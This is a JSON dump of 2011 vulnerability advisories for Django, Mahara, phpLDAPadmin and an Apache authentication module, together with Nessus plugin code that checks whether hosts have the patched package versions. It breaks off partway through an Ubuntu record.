{"osv": [{"lastseen": "2022-08-10T07:06:26", "description": "\nPaul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework:\n\n\n* [CVE-2011-4136](https://security-tracker.debian.org/tracker/CVE-2011-4136)\nWhen using memory-based sessions and caching, Django sessions are\n stored directly in the root namespace of the cache. When user data is\n stored in the same cache, a remote user may take over a session.\n* [CVE-2011-4137](https://security-tracker.debian.org/tracker/CVE-2011-4137), [CVE-2011-4138](https://security-tracker.debian.org/tracker/CVE-2011-4138)\nDjango's field type URLfield by default checks supplied URL's by\n issuing a request to it, which doesn't time out. A Denial of Service\n is possible by supplying specially prepared URL's that keep the\n connection open indefinately or fill the Django's server memory.\n* [CVE-2011-4139](https://security-tracker.debian.org/tracker/CVE-2011-4139)\nDjango used X-Forwarded-Host headers to construct full URL's. This\n header may not contain trusted input and could be used to poison the\n cache.\n* [CVE-2011-4140](https://security-tracker.debian.org/tracker/CVE-2011-4140)\nThe CSRF protection mechanism in Django does not properly handle\n web-server configurations supporting arbitrary HTTP Host headers,\n which allows remote attackers to trigger unauthenticated forged\n requests.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\n\n\nFor the testing (wheezy) and unstable distribution (sid), this problem\nhas been fixed in version 1.3.1-1.\n\n\nWe recommend that you upgrade your python-django packages.\n\n\n", "cvss3": {}, "published": "2011-10-29T00:00:00", "type": "osv", "title": "python-django - several issues", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2022-08-10T07:06:23", "id": "OSV:DSA-2332-1", "href": "https://osv.dev/vulnerability/DSA-2332-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:09:14", "description": "\nSeveral vulnerabilities were discovered in Mahara, an electronic portfolio, \nweblog, and resume builder:\n\n\n* [CVE-2011-2771](https://security-tracker.debian.org/tracker/CVE-2011-2771)\nTeemu Vesala discovered that missing input sanitising of RSS\n feeds could lead to cross-site scripting.\n* [CVE-2011-2772](https://security-tracker.debian.org/tracker/CVE-2011-2772)\nRichard Mansfield discovered that insufficient upload restrictions\n allowed denial of service.\n* [CVE-2011-2773](https://security-tracker.debian.org/tracker/CVE-2011-2773)\nRichard Mansfield discovered that the management of institutions was prone to\n cross-site request forgery.\n* (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability\n in MNet handling.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\n\nWe recommend that you upgrade your mahara packages.\n\n\n", "cvss3": {}, "published": "2011-11-04T00:00:00", "type": "osv", "title": "mahara - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773", "CVE-2011-4118"], "modified": "2022-08-10T07:08:47", "id": "OSV:DSA-2334-1", "href": "https://osv.dev/vulnerability/DSA-2334-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:09:14", "description": "\nTwo vulnerabilities have been discovered in phpLDAPadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\n\n* [CVE-2011-4074](https://security-tracker.debian.org/tracker/CVE-2011-4074)\nInput appended to the URL in cmd.php (when cmd is set to \\_debug) is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n* [CVE-2011-4075](https://security-tracker.debian.org/tracker/CVE-2011-4075)\nInput passed to the orderby parameter in cmd.php (when cmd is set to\n query\\_engine, query is set to none, and search is set to e.g.\n 1) is not properly sanitised in lib/functions.php before being used in a\n create\\_function() function call. This can be exploited to inject and\n execute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\n\nWe recommend that you upgrade your phpldapadmin packages.\n\n\n", "cvss3": {}, "published": "2011-10-31T00:00:00", "type": "osv", "title": "phpldapadmin - several issues", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2022-08-10T07:08:47", "id": "OSV:DSA-2333-1", "href": "https://osv.dev/vulnerability/DSA-2333-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:40", "description": "Django before 1.2.7 and 1.3.x before 1.3.1 uses a request's HTTP Host header to construct a full URL in certain circumstances, which allows remote attackers to conduct cache poisoning attacks via a crafted request.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-4", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4139"], "modified": "2021-07-05T00:01:18", "id": "OSV:PYSEC-2011-4", "href": "https://osv.dev/vulnerability/PYSEC-2011-4", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-05-12T01:09:40", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 originally tests a URL's validity through a HEAD request, but then uses a GET request for the new target URL in the case of a redirect, which might allow remote attackers to trigger arbitrary GET requests with an unintended source IP address via a crafted Location header.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4138"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-3", "href": "https://osv.dev/vulnerability/PYSEC-2011-3", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-12T01:09:40", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2021-07-05T00:01:18", "id": "OSV:PYSEC-2011-5", "href": "https://osv.dev/vulnerability/PYSEC-2011-5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T08:59:36", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2018-07-23T19:51:19", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2022-08-15T08:59:14", "id": "OSV:GHSA-H95J-H2RV-QRG4", "href": "https://osv.dev/vulnerability/GHSA-h95j-h2rv-qrg4", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:51", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-1", "href": "https://osv.dev/vulnerability/PYSEC-2011-1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-13T03:35:01", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2018-07-23T19:52:39", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2022-08-13T03:34:41", "id": "OSV:GHSA-X88J-93VC-WPMP", "href": "https://osv.dev/vulnerability/GHSA-x88j-93vc-wpmp", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-08-10T07:08:48", "description": "\nIt was discovered that libapache2-mod-authnz-external, an apache\nauthentication module, is prone to an SQL injection via the $user\nparameter.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.2.4-2+squeeze1.\n\n\nThe oldstable distribution (lenny) does not contain\nlibapache2-mod-authnz-external.\n\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.2.4-2.1.\n\n\nWe recommend that you upgrade your libapache2-mod-authnz-external packages.\n\n\n", "cvss3": {}, "published": "2011-07-19T00:00:00", "type": "osv", "title": "libapache2-mod-authnz-external - SQL injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2022-08-10T07:08:45", "id": "OSV:DSA-2279-1", "href": "https://osv.dev/vulnerability/DSA-2279-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T01:09:49", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "osv", "title": "PYSEC-2011-2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2021-07-05T00:01:17", "id": "OSV:PYSEC-2011-2", "href": "https://osv.dev/vulnerability/PYSEC-2011-2", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-08-15T09:00:24", "description": "The verify_exists functionality in the URLField implementation in Django before 1.2.7 and 1.3.x before 1.3.1 relies on Python libraries that attempt access to an arbitrary URL with no timeout, which allows remote attackers to cause a denial of service (resource consumption) via a URL associated with (1) a slow response, (2) a completed TCP connection with no application data sent, or (3) a large amount of application data, a related issue to CVE-2011-1521.", "cvss3": {}, "published": "2018-07-23T19:51:35", "type": "osv", "title": "Moderate severity vulnerability that affects django", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1521", "CVE-2011-4137"], "modified": "2022-08-15T09:00:16", "id": "OSV:GHSA-3JQW-CRQJ-W8QW", "href": "https://osv.dev/vulnerability/GHSA-3jqw-crqj-w8qw", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "nessus": [{"lastseen": "2022-05-24T16:00:42", "description": "Paul McMillan, Mozilla and the Django core team discovered several vulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136 When using memory-based sessions and caching, Django sessions are stored directly in the root namespace of the cache. When user data is stored in the same cache, a remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138 Django's field type URLfield by default checks supplied URL's by issuing a request to it, which doesn't time out. A Denial of Service is possible by supplying specially prepared URL's that keep the connection open indefinately or fill the Django's server memory.\n\n - CVE-2011-4139 Django used X-Forwarded-Host headers to construct full URL's. This header may not contain trusted input and could be used to poison the cache.\n\n - CVE-2011-4140 The CSRF protection mechanism in Django does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-31T00:00:00", "type": "nessus", "title": "Debian DSA-2332-1 : python-django - several issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:python-django", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2332.NASL", "href": "https://www.tenable.com/plugins/nessus/56671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2332. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56671);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n script_bugtraq_id(49573);\n script_xref(name:\"DSA\", value:\"2332\");\n\n script_name(english:\"Debian DSA-2332-1 : python-django - several issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul McMillan, Mozilla and the Django core team discovered several\nvulnerabilities in Django, a Python web framework :\n\n - CVE-2011-4136\n When using memory-based sessions and caching, Django\n sessions are stored directly in the root namespace of\n the cache. When user data is stored in the same cache, a\n remote user may take over a session.\n\n - CVE-2011-4137, CVE-2011-4138\n Django's field type URLfield by default checks supplied\n URL's by issuing a request to it, which doesn't time\n out. A Denial of Service is possible by supplying\n specially prepared URL's that keep the connection open\n indefinately or fill the Django's server memory.\n\n - CVE-2011-4139\n Django used X-Forwarded-Host headers to construct full\n URL's. This header may not contain trusted input and\n could be used to poison the cache.\n\n - CVE-2011-4140\n The CSRF protection mechanism in Django does not\n properly handle web-server configurations supporting\n arbitrary HTTP Host headers, which allows remote\n attackers to trigger unauthenticated forged requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4139\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/python-django\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2332\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the python-django packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-1+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.3-3+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"python-django\", reference:\"1.0.2-1+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django\", reference:\"1.2.3-3+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"python-django-doc\", reference:\"1.2.3-3+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:49:48", "description": "python-django update version to 1.2.7 fixes several security issues including denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139", "CVE-2011-4140"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python-django", "cpe:/o:novell:opensuse:11.4"], "id": "OPENSUSE-2012-294.NASL", "href": "https://www.tenable.com/plugins/nessus/74633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-294.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74633);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\", \"CVE-2011-4140\");\n\n script_name(english:\"openSUSE Security Update : python-django (openSUSE-SU-2012:0653-1)\");\n script_summary(english:\"Check for the openSUSE-2012-294 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"python-django update version to 1.2.7 fixes several security issues\nincluding denial of service, CSRF and information leaks:\nhttps://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=718045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.djangoproject.com/weblog/2011/sep/10/127/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"python-django-1.2.7-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:26", "description": "Pall McMillan discovered that Django used the root namespace when storing cached session data. A remote attacker could exploit this to modify sessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary URLs when the application used URLFields. This could be exploited by a remote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of a URL via a HEAD request, it would instead use a GET request for the target of a redirect. This could potentially be used to trigger arbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP Host header to construct a full URL. A remote attacker could exploit this to conduct host header cache poisoning attacks via a crafted request. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-12-09T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python-django", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", 